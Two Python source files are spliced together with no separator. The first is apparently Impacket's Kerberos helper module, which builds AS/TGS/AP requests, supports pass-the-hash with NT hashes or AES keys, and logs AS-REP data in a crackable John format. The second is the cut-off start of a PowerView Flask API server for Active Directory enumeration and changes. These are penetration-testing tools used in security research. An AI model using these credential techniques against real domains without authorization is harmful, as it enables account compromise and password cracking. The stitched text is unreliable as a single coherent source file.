# SECUREAUTH LABS. Copyright 2019 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author: Alberto Solino (@agsolino)
#
# Description:
#   Helper functions for kerberos
#   Just starting, TONS of things to do
#   In fact, make it easier
#

import datetime
import random
import socket
import struct
import os

from pyasn1.codec.der import decoder, encoder
from pyasn1.error import PyAsn1Error
from pyasn1.type.univ import noValue
from six import b
from binascii import unhexlify, hexlify

from impacket.krb5.asn1 import AS_REQ, AP_REQ, TGS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, PA_ENC_TS_ENC, AS_REP, TGS_REP, \
    EncryptedData, Authenticator, EncASRepPart, EncTGSRepPart, seq_set, seq_set_iter, KERB_ERROR_DATA, METHOD_DATA, \
    ETYPE_INFO2, ETYPE_INFO, AP_REP, EncAPRepPart
from impacket.krb5.types import KerberosTime, Principal, Ticket
from impacket.krb5.gssapi import CheckSumField, GSS_C_DCE_STYLE, GSS_C_MUTUAL_FLAG, GSS_C_REPLAY_FLAG, \
    GSS_C_SEQUENCE_FLAG, GSS_C_CONF_FLAG, GSS_C_INTEG_FLAG
from impacket.krb5 import constants
from impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum
from impacket.smbconnection import SessionError
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech, SPNEGO_NegTokenResp, ASN1_OID, asn1encode, ASN1_AID
from impacket.krb5.gssapi import KRB5_AP_REQ
from impacket import nt_errors, LOG
from impacket.krb5.ccache import CCache

# Our random number generator
try:
    rand = random.SystemRandom()
except NotImplementedError:
    rand = random
    pass

def sendReceive(data, host, kdcHost):
    if kdcHost is None:
        targetHost = host
    else:
        targetHost = kdcHost

    messageLen = struct.pack('!i', len(data))

    LOG.debug('Trying to connect to KDC at %s' % targetHost)
    try:
        af, socktype, proto, canonname, sa = socket.getaddrinfo(targetHost, 88, 0, socket.SOCK_STREAM)[0]
        s = socket.socket(af, socktype, proto)
        s.connect(sa)
    except socket.error as e:
        raise socket.error("Connection error (%s:%s)" % (targetHost, 88), e)

    s.sendall(messageLen + data)

    recvDataLen = struct.unpack('!i', s.recv(4))[0]

    r = s.recv(recvDataLen)
    while len(r) < recvDataLen:
        r += s.recv(recvDataLen-len(r))

    try:
        krbError = KerberosError(packet = decoder.decode(r, asn1Spec = KRB_ERROR())[0])
    except:
        return r

    if krbError.getErrorCode() != constants.ErrorCodes.KDC_ERR_PREAUTH_REQUIRED.value:
        raise krbError

    return r

def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcHost=None, requestPAC=True, encType=None):

    # Convert to binary form, just in case we're receiving strings
    if isinstance(lmhash, str):
        try:
            lmhash = unhexlify(lmhash)
        except TypeError:
            pass
    if isinstance(nthash, str):
        try:
            nthash = unhexlify(nthash)
        except TypeError:
            pass
    if isinstance(aesKey, str):
        try:
            aesKey = unhexlify(aesKey)
        except TypeError:
            pass

    asReq = AS_REQ()

    domain = domain.upper()
    serverName = Principal('krbtgt/%s'%domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)  

    pacRequest = KERB_PA_PAC_REQUEST()
    pacRequest['include-pac'] = requestPAC
    encodedPacRequest = encoder.encode(pacRequest)

    asReq['pvno'] = 5
    asReq['msg-type'] =  int(constants.ApplicationTagNumbers.AS_REQ.value)

    asReq['padata'] = noValue
    asReq['padata'][0] = noValue
    asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
    asReq['padata'][0]['padata-value'] = encodedPacRequest

    reqBody = seq_set(asReq, 'req-body')

    opts = list()
    opts.append( constants.KDCOptions.forwardable.value )
    opts.append( constants.KDCOptions.renewable.value )
    opts.append( constants.KDCOptions.proxiable.value )
    reqBody['kdc-options']  = constants.encodeFlags(opts)

    seq_set(reqBody, 'sname', serverName.components_to_asn1)
    seq_set(reqBody, 'cname', clientName.components_to_asn1)

    if domain == '':
        raise Exception('Empty Domain not allowed in Kerberos')

    reqBody['realm'] = domain

    now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
    reqBody['till'] = KerberosTime.to_asn1(now)
    reqBody['rtime'] = KerberosTime.to_asn1(now)
    reqBody['nonce'] =  rand.getrandbits(31)

    # Yes.. this shouldn't happen but it's inherited from the past
    if aesKey is None:
        aesKey = b''

    if nthash == b'':
        # This is still confusing. I thought KDC_ERR_ETYPE_NOSUPP was enough, 
        # but I found some systems that accepts all ciphers, and trigger an error 
        # when requesting subsequent TGS :(. More research needed.
        # So, in order to support more than one cypher, I'm setting aes first
        # since most of the systems would accept it. If we're lucky and 
        # KDC_ERR_ETYPE_NOSUPP is returned, we will later try rc4.
        if aesKey != b'':
            if len(aesKey) == 32:
                supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),)
            else:
                supportedCiphers = (int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
        else:
            supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),)
    else:
        # We have hashes to try, only way is to request RC4 only
        supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)

    if encType:
        supportedCiphers = (int(encType),)
    seq_set_iter(reqBody, 'etype', supportedCiphers)

    message = encoder.encode(asReq)

    try:
        r = sendReceive(message, domain, kdcHost)
    except KerberosError as e:
        if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
            if supportedCiphers[0] in (constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value) and aesKey == b'':
                supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
                
                seq_set_iter(reqBody, 'etype', supportedCiphers)
                message = encoder.encode(asReq)
                r = sendReceive(message, domain, kdcHost)
            else: 
                raise 
        else:
            raise 

    # This should be the PREAUTH_FAILED packet or the actual TGT if the target principal has the
    # 'Do not require Kerberos preauthentication' set
    preAuth = True
    try:
        asRep = decoder.decode(r, asn1Spec = KRB_ERROR())[0]
    except:
        # Most of the times we shouldn't be here, is this a TGT?
        asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
        # Yes
        preAuth = False

    encryptionTypesData = dict()
    salt = ''
    if preAuth is False:
        # In theory, we should have the right credentials for the etype specified before.
        methods = asRep['padata']
        encryptionTypesData[supportedCiphers[0]] = salt # handle RC4 fallback, we don't need any salt
        tgt = r
    else:
        methods = decoder.decode(asRep['e-data'], asn1Spec=METHOD_DATA())[0]

    for method in methods:
        if method['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO2.value:
            etypes2 = decoder.decode(method['padata-value'], asn1Spec = ETYPE_INFO2())[0]
            for etype2 in etypes2:
                try:
                    if etype2['salt'] is None or etype2['salt'].hasValue() is False:
                        salt = ''
                    else:
                        salt = etype2['salt'].prettyPrint()
                except PyAsn1Error:
                    salt = ''

                encryptionTypesData[etype2['etype']] = b(salt)
        elif method['padata-type'] == constants.PreAuthenticationDataTypes.PA_ETYPE_INFO.value:
            etypes = decoder.decode(method['padata-value'], asn1Spec = ETYPE_INFO())[0]
            for etype in etypes:
                try:
                    if etype['salt'] is None or etype['salt'].hasValue() is False:
                        salt = ''
                    else:
                        salt = etype['salt'].prettyPrint()
                except PyAsn1Error:
                    salt = ''

                encryptionTypesData[etype['etype']] = b(salt)

    enctype = supportedCiphers[0]

    cipher = _enctype_table[enctype]

    # Pass the hash/aes key :P
    if nthash != b'' and (isinstance(nthash, bytes) and nthash != b''):
        key = Key(cipher.enctype, nthash)
    elif aesKey != b'':
        key = Key(cipher.enctype, aesKey)
    else:
        key = cipher.string_to_key(password, encryptionTypesData[enctype], None)

    if preAuth is True:
        if enctype in encryptionTypesData is False:
            raise Exception('No Encryption Data Available!')

        # Let's build the timestamp
        timeStamp = PA_ENC_TS_ENC()

        now = datetime.datetime.utcnow()
        timeStamp['patimestamp'] = KerberosTime.to_asn1(now)
        timeStamp['pausec'] = now.microsecond

        # Encrypt the shyte
        encodedTimeStamp = encoder.encode(timeStamp)

        # Key Usage 1
        # AS-REQ PA-ENC-TIMESTAMP padata timestamp, encrypted with the
        # client key (Section 5.2.7.2)
        encriptedTimeStamp = cipher.encrypt(key, 1, encodedTimeStamp, None)

        encryptedData = EncryptedData()
        encryptedData['etype'] = cipher.enctype
        encryptedData['cipher'] = encriptedTimeStamp
        encodedEncryptedData = encoder.encode(encryptedData)

        # Now prepare the new AS_REQ again with the PADATA
        # ToDo: cannot we reuse the previous one?
        asReq = AS_REQ()

        asReq['pvno'] = 5
        asReq['msg-type'] =  int(constants.ApplicationTagNumbers.AS_REQ.value)

        asReq['padata'] = noValue
        asReq['padata'][0] = noValue
        asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_ENC_TIMESTAMP.value)
        asReq['padata'][0]['padata-value'] = encodedEncryptedData

        asReq['padata'][1] = noValue
        asReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
        asReq['padata'][1]['padata-value'] = encodedPacRequest

        reqBody = seq_set(asReq, 'req-body')

        opts = list()
        #opts.append( constants.KDCOptions.forwardable.value )
        #opts.append( constants.KDCOptions.renewable.value )
        opts.append( constants.KDCOptions.proxiable.value )
        reqBody['kdc-options'] = constants.encodeFlags(opts)

        seq_set(reqBody, 'sname', serverName.components_to_asn1)
        seq_set(reqBody, 'cname', clientName.components_to_asn1)

        reqBody['realm'] =  domain

        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
        reqBody['till'] = KerberosTime.to_asn1(now)
        reqBody['rtime'] =  KerberosTime.to_asn1(now)
        reqBody['nonce'] = rand.getrandbits(31)

        seq_set_iter(reqBody, 'etype', ( (int(cipher.enctype),)))

        try:
            tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
        except Exception as e:
            if str(e).find('KDC_ERR_ETYPE_NOSUPP') >= 0:
                if lmhash == b'' and nthash == b'' and (aesKey == b'' or aesKey is None):
                    from impacket.ntlm import compute_lmhash, compute_nthash
                    lmhash = compute_lmhash(password)
                    nthash = compute_nthash(password)
                    return getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey, kdcHost, requestPAC)
            raise


        asRep = decoder.decode(tgt, asn1Spec = AS_REP())[0]

    # So, we have the TGT, now extract the new session key and finish
    cipherText = asRep['enc-part']['cipher']

    if preAuth is False:
        # Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
        LOG.debug('$krb5asrep$%d$%s@%s:%s$%s' % (asRep['enc-part']['etype'],clientName, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]),
                                           hexlify(asRep['enc-part']['cipher'].asOctets()[16:])) )
    # Key Usage 3
    # AS-REP encrypted part (includes TGS session key or
    # application session key), encrypted with the client key
    # (Section 5.4.2)
    try:
        plainText = cipher.decrypt(key, 3, cipherText)
    except InvalidChecksum as e:
        # probably bad password if preauth is disabled
        if preAuth is False:
            error_msg = "failed to decrypt session key: %s" % str(e)
            raise SessionKeyDecryptionError(error_msg, asRep, cipher, key, cipherText)
        raise
    encASRepPart = decoder.decode(plainText, asn1Spec = EncASRepPart())[0]

    # Get the session key and the ticket
    cipher = _enctype_table[encASRepPart['key']['keytype']]
    sessionKey = Key(cipher.enctype,encASRepPart['key']['keyvalue'].asOctets())

    # ToDo: Check Nonces!    

    return tgt, cipher, key, sessionKey

def getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey, options, encType):

    # Decode the TGT
    try:
        decodedTGT = decoder.decode(tgt, asn1Spec = AS_REP())[0]
    except:
        decodedTGT = decoder.decode(tgt, asn1Spec = TGS_REP())[0]

    domain = domain.upper()
    # Extract the ticket from the TGT
    ticket = Ticket()
    ticket.from_asn1(decodedTGT['ticket'])

    apReq = AP_REQ()
    apReq['pvno'] = 5
    apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)

    opts = list()
    apReq['ap-options'] =  constants.encodeFlags(opts)
    seq_set(apReq,'ticket', ticket.to_asn1)

    authenticator = Authenticator()
    authenticator['authenticator-vno'] = 5
    authenticator['crealm'] = decodedTGT['crealm'].asOctets()

    clientName = Principal()
    clientName.from_asn1( decodedTGT, 'crealm', 'cname')

    seq_set(authenticator, 'cname', clientName.components_to_asn1)

    now = datetime.datetime.utcnow()
    authenticator['cusec'] =  now.microsecond
    authenticator['ctime'] = KerberosTime.to_asn1(now)

    encodedAuthenticator = encoder.encode(authenticator)

    # Key Usage 7
    # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
    # TGS authenticator subkey), encrypted with the TGS session
    # key (Section 5.5.1)
    encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)

    apReq['authenticator'] = noValue
    apReq['authenticator']['etype'] = cipher.enctype
    apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator

    encodedApReq = encoder.encode(apReq)

    tgsReq = TGS_REQ()

    tgsReq['pvno'] =  5
    tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
    tgsReq['padata'] = noValue
    tgsReq['padata'][0] = noValue
    tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
    tgsReq['padata'][0]['padata-value'] = encodedApReq

    reqBody = seq_set(tgsReq, 'req-body')

    opts = options
    #opts.append( constants.KDCOptions.forwardable.value )
    #opts.append( constants.KDCOptions.renewable.value )
    #opts.append( constants.KDCOptions.canonicalize.value )
    #opts.append( constants.KDCOptions.renewable_ok.value )
    #opts.append( constants.KDCOptions.canonicalize.value )

    reqBody['kdc-options'] = constants.encodeFlags(opts)
    seq_set(reqBody, 'sname', serverName.components_to_asn1)
    reqBody['realm'] = domain

    now = datetime.datetime.utcnow() + datetime.timedelta(days=1)

    reqBody['till'] = KerberosTime.to_asn1(now)
    reqBody['nonce'] = rand.getrandbits(31)
    if encType != None:
        seq_set_iter(reqBody, 'etype', ( (int(encType),)))
    else:
        seq_set_iter(reqBody, 'etype',
              (
                  int(constants.EncryptionTypes.rc4_hmac.value),
                  int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
                  int(constants.EncryptionTypes.des_cbc_md5.value),
                  int(cipher.enctype)
               )
        )

    message = encoder.encode(tgsReq)

    r = sendReceive(message, domain, kdcHost)

    # Get the session key

    tgs = decoder.decode(r, asn1Spec = TGS_REP())[0]

    cipherText = tgs['enc-part']['cipher']

    # Key Usage 8
    # TGS-REP encrypted part (includes application session
    # key), encrypted with the TGS session key (Section 5.4.2)
    plainText = cipher.decrypt(sessionKey, 8, cipherText)

    encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]

    newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'].asOctets())
    # Creating new cipher based on received keytype
    cipher = _enctype_table[encTGSRepPart['key']['keytype']]

    # Check we've got what we asked for
    res = decoder.decode(r, asn1Spec = TGS_REP())[0]
    spn = Principal()
    spn.from_asn1(res['ticket'], 'realm', 'sname')

    if spn.components[0] == serverName.components[0]:
        # Yes.. bye bye
        return r, cipher, sessionKey, newSessionKey
    else:
        # Let's extract the Ticket, change the domain and keep asking
        domain = spn.components[1]
        return getKerberosTGS(serverName, domain, kdcHost, r, cipher, newSessionKey)

################################################################################
# DCE RPC Helpers
################################################################################
def getKerberosType3(cipher, sessionKey, auth_data):
    negTokenResp = SPNEGO_NegTokenResp(auth_data)
    # If DCE_STYLE = FALSE
    #ap_rep = decoder.decode(negTokenResp['ResponseToken'][16:], asn1Spec=AP_REP())[0]
    try:
        krbError = KerberosError(packet = decoder.decode(negTokenResp['ResponseToken'][15:], asn1Spec = KRB_ERROR())[0])
    except Exception:
        pass
    else:
        raise krbError

    ap_rep = decoder.decode(negTokenResp['ResponseToken'], asn1Spec=AP_REP())[0]

    cipherText = ap_rep['enc-part']['cipher']

    # Key Usage 12
    # AP-REP encrypted part (includes application session
    # subkey), encrypted with the application session key
    # (Section 5.5.2)
    plainText = cipher.decrypt(sessionKey, 12, cipherText)

    encAPRepPart = decoder.decode(plainText, asn1Spec = EncAPRepPart())[0]

    cipher = _enctype_table[int(encAPRepPart['subkey']['keytype'])]()
    sessionKey2 = Key(cipher.enctype, encAPRepPart['subkey']['keyvalue'].asOctets())

    sequenceNumber = int(encAPRepPart['seq-number'])

    encAPRepPart['subkey'].clear()
    encAPRepPart = encAPRepPart.clone()

    now = datetime.datetime.utcnow()
    encAPRepPart['cusec'] = now.microsecond
    encAPRepPart['ctime'] = KerberosTime.to_asn1(now)
    encAPRepPart['seq-number'] = sequenceNumber
    encodedAuthenticator = encoder.encode(encAPRepPart)

    encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 12, encodedAuthenticator, None)

    ap_rep['enc-part'].clear()
    ap_rep['enc-part']['etype'] = cipher.enctype
    ap_rep['enc-part']['cipher'] = encryptedEncodedAuthenticator

    resp = SPNEGO_NegTokenResp()
    resp['ResponseToken'] = encoder.encode(ap_rep)

    return cipher, sessionKey2, resp.getData()

def getKerberosType1(username, password, domain, lmhash, nthash, aesKey='', TGT = None, TGS = None, targetName='',
                     kdcHost = None, useCache = True):

    # Convert to binary form, just in case we're receiving strings
    if isinstance(lmhash, str):
        try:
            lmhash = unhexlify(lmhash)
        except TypeError:
            pass
    if isinstance(nthash, str):
        try:
            nthash = unhexlify(nthash)
        except TypeError:
            pass
    if isinstance(aesKey, str):
        try:
            aesKey = unhexlify(aesKey)
        except TypeError:
            pass

    if TGT is None and TGS is None:
        if useCache is True:
            try:
                ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
            except Exception:
                # No cache present
                pass
            else:
                # retrieve domain information from CCache file if needed
                if domain == '':
                    domain = ccache.principal.realm['data'].decode('utf-8')
                    LOG.debug('Domain retrieved from CCache: %s' % domain)

                LOG.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
                principal = 'host/%s@%s' % (targetName.upper(), domain.upper())
                creds = ccache.getCredential(principal)
                if creds is None:
                    # Let's try for the TGT and go from there
                    principal = 'krbtgt/%s@%s' % (domain.upper(),domain.upper())
                    creds =  ccache.getCredential(principal)
                    if creds is not None:
                        TGT = creds.toTGT()
                        LOG.debug('Using TGT from cache')
                    else:
                        LOG.debug("No valid credentials found in cache. ")
                else:
                    TGS = creds.toTGS(principal)

                # retrieve user information from CCache file if needed
                if username == '' and creds is not None:
                    username = creds['client'].prettyPrint().split(b'@')[0].decode('utf-8')
                    LOG.debug('Username retrieved from CCache: %s' % username)
                elif username == '' and len(ccache.principal.components) > 0:
                    username = ccache.principal.components[0]['data'].decode('utf-8')
                    LOG.debug('Username retrieved from CCache: %s' % username)

    # First of all, we need to get a TGT for the user
    userName = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
    while True:
        if TGT is None:
            if TGS is None:
                try:
                    tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, aesKey, kdcHost)
                except KerberosError as e:
                    if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
                        # We might face this if the target does not support AES 
                        # So, if that's the case we'll force using RC4 by converting
                        # the password to lm/nt hashes and hope for the best. If that's already
                        # done, byebye.
                        if lmhash == b'' and nthash == b'' and (aesKey == b'' or aesKey is None) and TGT is None and TGS is None:
                            from impacket.ntlm import compute_lmhash, compute_nthash
                            LOG.debug('Got KDC_ERR_ETYPE_NOSUPP, fallback to RC4')
                            lmhash = compute_lmhash(password)
                            nthash = compute_nthash(password) 
                            continue
                        else:
                            raise 
                    else:
                        raise

        else:
            tgt = TGT['KDC_REP']
            cipher = TGT['cipher']
            sessionKey = TGT['sessionKey'] 

        # Now that we have the TGT, we should ask for a TGS for cifs

        if TGS is None:
            serverName = Principal('host/%s' % targetName, type=constants.PrincipalNameType.NT_SRV_INST.value)
            try:
                tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey)
            except KerberosError as e:
                if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
                    # We might face this if the target does not support AES 
                    # So, if that's the case we'll force using RC4 by converting
                    # the password to lm/nt hashes and hope for the best. If that's already
                    # done, byebye.
                    if lmhash == b'' and nthash == b'' and (aesKey == b'' or aesKey is None) and TGT is None and TGS is None:
                        from impacket.ntlm import compute_lmhash, compute_nthash
                        LOG.debug('Got KDC_ERR_ETYPE_NOSUPP, fallback to RC4')
                        lmhash = compute_lmhash(password)
                        nthash = compute_nthash(password) 
                    else:
                        raise 
                else:
                    raise 
            else:
                break
        else:
            tgs = TGS['KDC_REP']
            cipher = TGS['cipher']
            sessionKey = TGS['sessionKey'] 
            break

    # Let's build a NegTokenInit with a Kerberos REQ_AP

    blob = SPNEGO_NegTokenInit() 

    # Kerberos
    blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]

    # Let's extract the ticket from the TGS
    tgs = decoder.decode(tgs, asn1Spec = TGS_REP())[0]
    ticket = Ticket()
    ticket.from_asn1(tgs['ticket'])
    
    # Now let's build the AP_REQ
    apReq = AP_REQ()
    apReq['pvno'] = 5
    apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)

    opts = list()
    opts.append(constants.APOptions.mutual_required.value)
    apReq['ap-options'] = constants.encodeFlags(opts)
    seq_set(apReq,'ticket', ticket.to_asn1)

    authenticator = Authenticator()
    authenticator['authenticator-vno'] = 5
    authenticator['crealm'] = domain
    seq_set(authenticator, 'cname', userName.components_to_asn1)
    now = datetime.datetime.utcnow()

    authenticator['cusec'] = now.microsecond
    authenticator['ctime'] = KerberosTime.to_asn1(now)

    
    authenticator['cksum'] = noValue
    authenticator['cksum']['cksumtype'] = 0x8003

    chkField = CheckSumField()
    chkField['Lgth'] = 16

    chkField['Flags'] = GSS_C_CONF_FLAG | GSS_C_INTEG_FLAG | GSS_C_SEQUENCE_FLAG | GSS_C_REPLAY_FLAG | GSS_C_MUTUAL_FLAG | GSS_C_DCE_STYLE
    #chkField['Flags'] = GSS_C_INTEG_FLAG | GSS_C_SEQUENCE_FLAG | GSS_C_REPLAY_FLAG | GSS_C_MUTUAL_FLAG | GSS_C_DCE_STYLE
    authenticator['cksum']['checksum'] = chkField.getData()
    authenticator['seq-number'] = 0
    encodedAuthenticator = encoder.encode(authenticator)

    # Key Usage 11
    # AP-REQ Authenticator (includes application authenticator
    # subkey), encrypted with the application session key
    # (Section 5.5.1)
    encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)

    apReq['authenticator'] = noValue
    apReq['authenticator']['etype'] = cipher.enctype
    apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator

    blob['MechToken'] = struct.pack('B', ASN1_AID) + asn1encode( struct.pack('B', ASN1_OID) + asn1encode(
            TypesMech['KRB5 - Kerberos 5'] ) + KRB5_AP_REQ + encoder.encode(apReq))

    return cipher, sessionKey, blob.getData()


class SessionKeyDecryptionError(Exception):
    """
    Exception risen when we fail to decrypt a session key within an AS-REP
    message.
    It provides context information such as full AS-REP message but also the
    cipher, key and cipherText used when the error occurred.
    """
    def __init__( self, message, asRep, cipher, key, cipherText):
        self.message = message
        self.asRep = asRep
        self.cipher = cipher
        self.key = key
        self.cipherText = cipherText

    def __str__ ( self):
        return "SessionKeyDecryptionError: %s" % self.message


class KerberosError(SessionError):
    """
    This is the exception every client should catch regardless of the underlying
    SMB version used. We'll take care of that. NETBIOS exceptions are NOT included,
    since all SMB versions share the same NETBIOS instances.
    """
    def __init__( self, error = 0, packet=0):
        SessionError.__init__(self)
        self.error = error
        self.packet = packet
        if packet != 0:
            self.error = self.packet['error-code']
       
    def getErrorCode( self ):
        return self.error

    def getErrorPacket( self ):
        return self.packet

    def getErrorString( self ):
        return constants.ERROR_MESSAGES[self.error]

    def __str__( self ):
        retString = 'Kerberos SessionError: %s(%s)' % (constants.ERROR_MESSAGES[self.error])
        try:
            # Let's try to get the NT ERROR, if not, we quit and give the general one
            if self.error == constants.ErrorCodes.KRB_ERR_GENERIC.value:
                eData = decoder.decode(self.packet['e-data'], asn1Spec = KERB_ERROR_DATA())[0]
                nt_error = struct.unpack('<L', eData['data-value'].asOctets()[:4])[0]
                retString += '\nNT ERROR: %s(%s)' % (nt_errors.ERROR_MESSAGES[nt_error])
        except:
            pass

        return retString



#!/usr/bin/env python3
from flask import Flask, jsonify, request, render_template, Response, stream_with_context
import logging
from contextlib import redirect_stdout, redirect_stderr
import io
import os
import sys
import threading
from datetime import date,datetime
import shlex
import fnmatch
from argparse import Namespace
from powerview.web.api.helpers import make_serializable
from powerview.utils.parsers import powerview_arg_parse
from powerview.utils.constants import UAC_DICT
from powerview._version import __version__ as version
from powerview.lib.ldap3.extend import CustomExtendedOperationsRoot
from powerview.modules.smbclient import SMBClient
from powerview.utils.helpers import is_ipaddress, is_valid_fqdn, host2ip, is_valid_sid
import json

class APIServer:
	def __init__(self, powerview, host="127.0.0.1", port=5000):
		self.app = Flask(__name__, static_folder='../../web/front-end/static', template_folder='../../web/front-end/templates')
		
		self.basic_auth = None
		self.web_auth_user = powerview.args.web_auth['web_auth_user'] if powerview.args.web_auth else None
		self.web_auth_password = powerview.args.web_auth['web_auth_password'] if powerview.args.web_auth else None
		if self.web_auth_user and self.web_auth_password:
			try:
				from flask_basicauth import BasicAuth
				self.app.config['BASIC_AUTH_USERNAME'] = self.web_auth_user
				self.app.config['BASIC_AUTH_PASSWORD'] = self.web_auth_password
				self.basic_auth = BasicAuth(self.app)
			except ImportError:
				logging.error("flask_basicauth is not installed. Please install it using 'pip install flask-basicauth'")
				sys.exit(1)
		
		cli = sys.modules['flask.cli']
		cli.show_server_banner = lambda *x: None

		self.powerview = powerview
		self.host = host
		self.port = port
		self.status = False
		
		components = [self.powerview.flatName.lower(), self.powerview.args.username.lower(), self.powerview.args.ldap_address.lower()]
		folder_name = '-'.join(filter(None, components)) or "default-log"
		file_name = "%s.log" % datetime.now().strftime("%Y-%m-%d")
		self.log_file_path = os.path.join(os.path.expanduser('~/.powerview/logs/'), folder_name, file_name)
		self.history_file_path = os.path.join(os.path.expanduser('~/.powerview/logs/'), folder_name, '.powerview_history')

		# Define routes
		self._register_routes()

		self.nav_items = [
			{"name": "Explorer", "icon": "fas fa-folder-tree", "link": "/"},
			{"name": "Dashboard", "icon": "fas fa-chart-line", "link": "/dashboard"},
			{"name": "Modules", "icon": "fas fa-cubes", "subitems": [
				{"name": "Users", "icon": "far fa-user", "link": "/users"},
				{"name": "Computers", "icon": "fas fa-display", "link": "/computers"},
				{"name": "Groups", "icon": "fas fa-users", "link": "/groups"},
				{"name": "DNS", "icon": "fas fa-globe", "link": "/dns"},
				{"name": "CA", "icon": "fas fa-certificate", "link": "/ca"},
				{"name": "OUs", "icon": "fas fa-building", "link": "/ou"},
				{"name": "GPOs", "icon": "fas fa-building", "link": "/gpo"},
				{"name": "SMB Browser", "icon": "fas fa-building", "link": "/smb"},
			]},
			{"name": "Utils", "icon": "fas fa-toolbox", "link": "/utils"},
			{"name": "Logs", "icon": "far fa-file-alt", "button_id": "toggle-command-history"},
			{"name": "Settings", "icon": "fas fa-cog", "button_id": "toggle-settings"}
		]

	def _register_routes(self):
		def add_route_with_auth(rule, endpoint, view_func, **options):
			decorated_view = view_func
			if self.basic_auth:
				decorated_view = self.basic_auth.required(view_func)
			self.app.add_url_rule(rule, endpoint, decorated_view, **options)

		add_route_with_auth('/', 'index', self.render_index, methods=['GET'])
		add_route_with_auth('/dashboard', 'dashboard', self.render_dashboard, methods=['GET'])
		add_route_with_auth('/users', 'users', self.render_users, methods=['GET'])
		add_route_with_auth('/computers', 'computers', self.render_computers, methods=['GET'])
		add_route_with_auth('/dns', 'dns', self.render_dns, methods=['GET'])
		add_route_with_auth('/groups', 'groups', self.render_groups, methods=['GET'])
		add_route_with_auth('/ca', 'ca', self.render_ca, methods=['GET'])
		add_route_with_auth('/ou', 'ou', self.render_ou, methods=['GET'])
		add_route_with_auth('/gpo', 'gpo', self.render_gpo, methods=['GET'])
		add_route_with_auth('/smb', 'smb', self.render_smb, methods=['GET'])
		add_route_with_auth('/utils', 'utils', self.render_utils, methods=['GET'])
		add_route_with_auth('/api/server/info', 'server_info', self.handle_server_info, methods=['GET'])
		add_route_with_auth('/api/set/settings', 'set_settings', self.handle_set_settings, methods=['POST'])
		add_route_with_auth('/api/get/<method_name>', 'get_operation', self.handle_get_operation, methods=['GET', 'POST'])
		add_route_with_auth('/api/set/<method_name>', 'set_operation', self.handle_set_operation, methods=['POST'])
		add_route_with_auth('/api/add/<method_name>', 'add_operation', self.handle_add_operation, methods=['POST'])
		add_route_with_auth('/api/invoke/<method_name>', 'invoke_operation', self.handle_invoke_operation, methods=['POST'])
		add_route_with_auth('/api/remove/<method_name>', 'remove_operation', self.handle_remove_operation, methods=['POST'])
		add_route_with_auth('/api/start/<method_name>', 'start_operation', self.handle_start_operation, methods=['POST'])
		add_route_with_auth('/api/stop/<method_name>', 'stop_operation', self.handle_stop_operation, methods=['POST'])
		add_route_with_auth('/api/convertfrom/<method_name>', 'convert_from_operation', self.handle_convert_from_operation, methods=['POST'])
		add_route_with_auth('/api/convertto/<method_name>', 'convert_to_operation', self.handle_convert_to_operation, methods=['POST'])
		add_route_with_auth('/api/get/domaininfo', 'domaininfo', self.handle_domaininfo, methods=['GET'])
		add_route_with_auth('/health', 'health', self.handle_health, methods=['GET'])
		add_route_with_auth('/api/connectioninfo', 'connectioninfo', self.handle_connection_info, methods=['GET'])
		add_route_with_auth('/api/logs', 'logs', self.generate_log_stream, methods=['GET'])
		add_route_with_auth('/api/history', 'history', self.render_history, methods=['GET'])
